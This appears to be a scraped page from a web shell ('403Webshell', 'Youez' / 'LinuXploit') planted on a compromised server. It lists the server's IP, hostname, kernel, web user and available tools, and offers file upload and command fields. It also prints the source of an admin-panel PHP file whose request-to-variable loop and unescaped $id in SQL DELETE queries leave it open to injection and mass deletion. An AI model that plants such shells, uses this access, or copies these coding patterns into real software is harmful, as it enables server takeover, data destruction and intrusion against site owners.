403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/rsdgroup/adminPanel/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/rsdgroup/adminPanel/album_list.php
<?php 
include_once("session.php");
include_once("settings.php");
include_once("functions.php");
foreach ($_REQUEST as $key => $value){
	$$key = $value;
}
if($action == 'DeleteAlbum'){
	$sql	=	"SELECT * FROM `tblPhoto` where `albumId` = ".$id."";
	$result	=	mysql_query($sql) or die (mysql_error());
	while($row	=	mysql_fetch_assoc($result)){	
		@unlink("../cat_images/media/pics/".$row['media']);
          
		$sql1	=	"DELETE FROM `tblPhoto` WHERE `id` = ".$row['id']." LIMIT 1";
		mysql_query($sql1) or die(mysql_error());
	}	 
	$sql2	=	"DELETE FROM `tblAlbum` WHERE `id` = ".$id." LIMIT 1";
	mysql_query($sql2) or die(mysql_error()); 
}

 function getAlbumName($id){
	$sql	=	"SELECT * FROM `tblAlbum` where isDeleted = 'Activate' AND `id` = ".$id."";
	$result	=	mysql_query($sql);
	$album	=	mysql_fetch_assoc($result);
	return $album['albumName']; 
}

?> 
<LINK href="mel.css" type=text/css rel=stylesheet>
<LINK href="sdmenu.css" type=text/css rel=stylesheet>
<table width="94%" border="0" cellspacing="0" cellpadding="0">
	<tr> 
		<td>
			<fieldset>
				<legend>ALBUM LIST</legend>
				<table width="100%" border="0" cellspacing="2" cellpadding="0">
				<?php	if($msg	!=	""){	?>
					<tr valign="middle" class="general"> 
						<td height="26" colspan="2" align="center"><?=$msg;?></td>
					</tr>
				<?php } ?>
					<tr valign="middle" class="general"> 
						<td height="26" colspan="2"><input type="button" name="btnadd22" value="Add Album" class="button" onclick="window.location.href='album_add.php?mode=Add&page=addalbum'" style="width:150px" /></td>
					</tr>
					<tr valign="middle" class="general"> 
						<td width="43%" height="26">File</td>
						<td width="43%" height="26">Album Name</td>
						<td width="43%" height="26" align="center" valign="middle" >Action</td>
					</tr>
					<?php
						$query	=	"select * from `tblPhoto` where `type` = 'pic' group by albumId  order by createdOn DESC";
						$result	=	mysql_query($query);
						while($arrayCategory=mysql_fetch_assoc($result)){	  
					?>
					<tr valign="middle" class="generaltxt"> 
						<td height="26">
							<?php 
								if($arrayCategory['type'] == 'pic'){ ?>
									<img src="../cat_images/media/pics/<?php echo $arrayCategory['media']; ?>" height="50"> 
                                                         
							<?php	}  
								else{  ?>
									<img src="images/swf.png" height="50">
							<?php	}  
							?>
						</td>
						<td height="26"><?php echo stripslashes(getAlbumName($arrayCategory['albumId'])); ?></td>
						<td align="center">

						<a href="albumPic_list.php?id=<?=$arrayCategory['albumId']?>&mode=Edit" class="action1"><strong>Edit</strong></a> 
			            | <a href="album_list.php?id=<?=$arrayCategory['albumId']?>&action=DeleteAlbum" onClick="return confirm('Are you sure you want to delete')" class="action1"><strong>Delete</strong></a></td>
					</tr>
					<?php } ?>
					<tr align="right" valign="middle" class="generaltxt"> 
						<td height="10" colspan="2">&nbsp;</td>
					</tr>
					<tr align="right" valign="middle" class="generaltxt"> 
						<td height="26" colspan="3"><input type="button" name="btnadd2" value="Add Album" class="button" onclick="window.location.href='album_add.php?mode=Add&page=addalbum'" style="width:150px" /></td>
					</tr>
				</table>
			</fieldset>
		</td>
	</tr>	
</table>

Youez - 2016 - github.com/yon3zu
LinuXploit